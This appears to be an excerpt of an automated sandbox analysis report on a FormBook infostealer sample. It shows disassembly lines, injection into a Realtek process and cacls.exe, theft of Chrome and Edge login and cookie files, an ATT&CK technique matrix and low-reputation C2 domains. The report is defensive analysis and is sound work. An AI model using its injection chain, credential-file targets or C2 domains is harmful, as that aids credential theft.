                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0154F51B mov eax, dword ptr fs:[00000030h]2_2_0154F51B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0154F51B mov eax, dword ptr fs:[00000030h]2_2_0154F51B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0154F51B mov eax, dword ptr fs:[00000030h]2_2_0154F51B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0154F51B mov ecx, dword ptr fs:[00000030h]2_2_0154F51B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0154F51B mov ecx, dword ptr fs:[00000030h]2_2_0154F51B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0154F51B mov eax, dword ptr fs:[00000030h]2_2_0154F51B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0154F51B mov eax, dword ptr fs:[00000030h]2_2_0154F51B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0154F51B mov eax, dword ptr fs:[00000030h]2_2_0154F51B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0154F51B mov eax, dword ptr fs:[00000030h]2_2_0154F51B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0154F51B mov eax, dword ptr fs:[00000030h]2_2_0154F51B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C1514 mov eax, dword ptr fs:[00000030h]2_2_014C1514
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C1514 mov eax, dword ptr fs:[00000030h]2_2_014C1514
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C1514 mov eax, dword ptr fs:[00000030h]2_2_014C1514
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C1514 mov eax, dword ptr fs:[00000030h]2_2_014C1514
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C1514 mov eax, dword ptr fs:[00000030h]2_2_014C1514
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C1514 mov eax, dword ptr fs:[00000030h]2_2_014C1514
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B252B mov eax, dword ptr fs:[00000030h]2_2_014B252B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B252B mov eax, dword ptr fs:[00000030h]2_2_014B252B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B252B mov eax, dword ptr fs:[00000030h]2_2_014B252B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B252B mov eax, dword ptr fs:[00000030h]2_2_014B252B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B252B mov eax, dword ptr fs:[00000030h]2_2_014B252B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B252B mov eax, dword ptr fs:[00000030h]2_2_014B252B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B252B mov eax, dword ptr fs:[00000030h]2_2_014B252B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D1527 mov eax, dword ptr fs:[00000030h]2_2_014D1527
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DF523 mov eax, dword ptr fs:[00000030h]2_2_014DF523
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149753F mov eax, dword ptr fs:[00000030h]2_2_0149753F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149753F mov eax, dword ptr fs:[00000030h]2_2_0149753F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149753F mov eax, dword ptr fs:[00000030h]2_2_0149753F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2539 mov eax, dword ptr fs:[00000030h]2_2_014E2539
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A3536 mov eax, dword ptr fs:[00000030h]2_2_014A3536
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A3536 mov eax, dword ptr fs:[00000030h]2_2_014A3536
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152B5D3 mov eax, dword ptr fs:[00000030h]2_2_0152B5D3
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DC5C6 mov eax, dword ptr fs:[00000030h]2_2_014DC5C6
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F5C7 mov eax, dword ptr fs:[00000030h]2_2_0149F5C7
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F5C7 mov eax, dword ptr fs:[00000030h]2_2_0149F5C7
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F5C7 mov eax, dword ptr fs:[00000030h]2_2_0149F5C7
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F5C7 mov eax, dword ptr fs:[00000030h]2_2_0149F5C7
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F5C7 mov eax, dword ptr fs:[00000030h]2_2_0149F5C7
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F5C7 mov eax, dword ptr fs:[00000030h]2_2_0149F5C7
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F5C7 mov eax, dword ptr fs:[00000030h]2_2_0149F5C7
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F5C7 mov eax, dword ptr fs:[00000030h]2_2_0149F5C7
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F5C7 mov eax, dword ptr fs:[00000030h]2_2_0149F5C7
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_015205C6 mov eax, dword ptr fs:[00000030h]2_2_015205C6
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D65D0 mov eax, dword ptr fs:[00000030h]2_2_014D65D0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D15EF mov eax, dword ptr fs:[00000030h]2_2_014D15EF
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AB5E0 mov eax, dword ptr fs:[00000030h]2_2_014AB5E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AB5E0 mov eax, dword ptr fs:[00000030h]2_2_014AB5E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AB5E0 mov eax, dword ptr fs:[00000030h]2_2_014AB5E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AB5E0 mov eax, dword ptr fs:[00000030h]2_2_014AB5E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AB5E0 mov eax, dword ptr fs:[00000030h]2_2_014AB5E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AB5E0 mov eax, dword ptr fs:[00000030h]2_2_014AB5E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DA5E7 mov ebx, dword ptr fs:[00000030h]2_2_014DA5E7
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DA5E7 mov eax, dword ptr fs:[00000030h]2_2_014DA5E7
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152C5FC mov eax, dword ptr fs:[00000030h]2_2_0152C5FC
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_015255E0 mov eax, dword ptr fs:[00000030h]2_2_015255E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152C592 mov eax, dword ptr fs:[00000030h]2_2_0152C592
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01547591 mov edi, dword ptr fs:[00000030h]2_2_01547591
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DA580 mov eax, dword ptr fs:[00000030h]2_2_014DA580
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DA580 mov eax, dword ptr fs:[00000030h]2_2_014DA580
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D9580 mov eax, dword ptr fs:[00000030h]2_2_014D9580
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D9580 mov eax, dword ptr fs:[00000030h]2_2_014D9580
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0155F582 mov eax, dword ptr fs:[00000030h]2_2_0155F582
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0151E588 mov eax, dword ptr fs:[00000030h]2_2_0151E588
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0151E588 mov eax, dword ptr fs:[00000030h]2_2_0151E588
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D2594 mov eax, dword ptr fs:[00000030h]2_2_014D2594
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_015285AA mov eax, dword ptr fs:[00000030h]2_2_015285AA
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A45B0 mov eax, dword ptr fs:[00000030h]2_2_014A45B0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A45B0 mov eax, dword ptr fs:[00000030h]2_2_014A45B0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B0445 mov eax, dword ptr fs:[00000030h]2_2_014B0445
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B0445 mov eax, dword ptr fs:[00000030h]2_2_014B0445
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B0445 mov eax, dword ptr fs:[00000030h]2_2_014B0445
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B0445 mov eax, dword ptr fs:[00000030h]2_2_014B0445
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B0445 mov eax, dword ptr fs:[00000030h]2_2_014B0445
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B0445 mov eax, dword ptr fs:[00000030h]2_2_014B0445
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01520443 mov eax, dword ptr fs:[00000030h]2_2_01520443
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CE45E mov eax, dword ptr fs:[00000030h]2_2_014CE45E
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CE45E mov eax, dword ptr fs:[00000030h]2_2_014CE45E
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CE45E mov eax, dword ptr fs:[00000030h]2_2_014CE45E
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CE45E mov eax, dword ptr fs:[00000030h]2_2_014CE45E
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CE45E mov eax, dword ptr fs:[00000030h]2_2_014CE45E
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DD450 mov eax, dword ptr fs:[00000030h]2_2_014DD450
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DD450 mov eax, dword ptr fs:[00000030h]2_2_014DD450
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AD454 mov eax, dword ptr fs:[00000030h]2_2_014AD454
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AD454 mov eax, dword ptr fs:[00000030h]2_2_014AD454
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AD454 mov eax, dword ptr fs:[00000030h]2_2_014AD454
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AD454 mov eax, dword ptr fs:[00000030h]2_2_014AD454
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AD454 mov eax, dword ptr fs:[00000030h]2_2_014AD454
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AD454 mov eax, dword ptr fs:[00000030h]2_2_014AD454
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0155F478 mov eax, dword ptr fs:[00000030h]2_2_0155F478
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0156A464 mov eax, dword ptr fs:[00000030h]2_2_0156A464
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152E461 mov eax, dword ptr fs:[00000030h]2_2_0152E461
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A8470 mov eax, dword ptr fs:[00000030h]2_2_014A8470
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A8470 mov eax, dword ptr fs:[00000030h]2_2_014A8470
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149640D mov eax, dword ptr fs:[00000030h]2_2_0149640D
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01536400 mov eax, dword ptr fs:[00000030h]2_2_01536400
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01536400 mov eax, dword ptr fs:[00000030h]2_2_01536400
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0155F409 mov eax, dword ptr fs:[00000030h]2_2_0155F409
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0155D430 mov eax, dword ptr fs:[00000030h]2_2_0155D430
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0155D430 mov eax, dword ptr fs:[00000030h]2_2_0155D430
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D7425 mov eax, dword ptr fs:[00000030h]2_2_014D7425
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D7425 mov ecx, dword ptr fs:[00000030h]2_2_014D7425
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtQuerySystemInformation: Direct from: 0x351436D
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x3515954
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x3DBC775
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtQueryInformationToken: Direct from: 0x350CC5F
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x350B105
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtResumeThread: Direct from: 0x3DBC9B7
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtClose: Direct from: 0x7FFAAECE9E7F
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtClose: Direct from: 0x3514562
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x351441C
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe NtResumeThread: Indirect: 0x1383B10
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x3DBC946
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe NtQueueApcThread: Indirect: 0x137F334
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x35142D1
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe NtSetContextThread: Indirect: 0x13834F0
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtCreateThreadEx: Direct from: 0x350B95F
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x7FFAE1422651
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x350D322
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x350D366
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x350C552
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x350D237
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe NtClose: Indirect: 0x137F3B9
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x35144C4
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x350D2F3
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x3DC44CD
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe NtSuspendThread: Indirect: 0x1383800
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Memory written: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Section loaded: NULL target: C:\Windows\SysWOW64\cacls.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read write
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Thread register set: target process: 7488
                Source: C:\Windows\SysWOW64\cacls.exe Thread register set: target process: 7488
                Source: C:\Windows\SysWOW64\cacls.exe Thread register set: target process: 6088
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Process created: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe "C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe"
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Process created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
                Source: C:\Windows\SysWOW64\cacls.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: RAVCpl64.exe, 00000003.00000002.183786660977.0000000001010000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.179162753053.0000000001010000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: #Program Manager|$iB=
                Source: RAVCpl64.exe, 00000003.00000002.183786660977.0000000001010000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.179162753053.0000000001010000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: RAVCpl64.exe, 00000003.00000002.183786660977.0000000001010000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.179162753053.0000000001010000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: RAVCpl64.exe, 00000003.00000002.183786660977.0000000001010000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.179162753053.0000000001010000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Queries volume information: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe VolumeInformation
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match File source: 2.2.Pp7OXMFwqhXKx5Y.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 2.2.Pp7OXMFwqhXKx5Y.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000002.00000002.179274577947.0000000005D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.182790212280.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.182790291540.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\cacls.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\cacls.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\cacls.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\cacls.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\cacls.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\cacls.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\cacls.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\cacls.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match File source: 2.2.Pp7OXMFwqhXKx5Y.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 2.2.Pp7OXMFwqhXKx5Y.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000002.00000002.179274577947.0000000005D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.182790212280.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.182790291540.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 Services File Permissions Weakness | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 5 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Services File Permissions Weakness | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 5 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Services File Permissions Weakness | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Software Packing | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                Behavior Graph ID: 1567413, Sample: Pp7OXMFwqhXKx5Y.exe, Startdate: 03/12/2024, Architecture: WINDOWS, Score: 100
                Process chain: Pp7OXMFwqhXKx5Y.exe (started) -> Pp7OXMFwqhXKx5Y.exe (started) -> RAVCpl64.exe (injected) -> cacls.exe (started) -> firefox.exe (started)
                Sample-level signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 3 other signatures
                Sample-level DNS/IP: www.juewucangku.xyz; www.foggvdqutxzgea.xyz (Performs DNS queries to domains with low reputation); 19 other IPs or domains
                Pp7OXMFwqhXKx5Y.exe (first instance): dropped C:\Users\user\...\Pp7OXMFwqhXKx5Y.exe.log, ASCII; Injects a PE file into a foreign processes; Switches to a custom stack to bypass stack traces
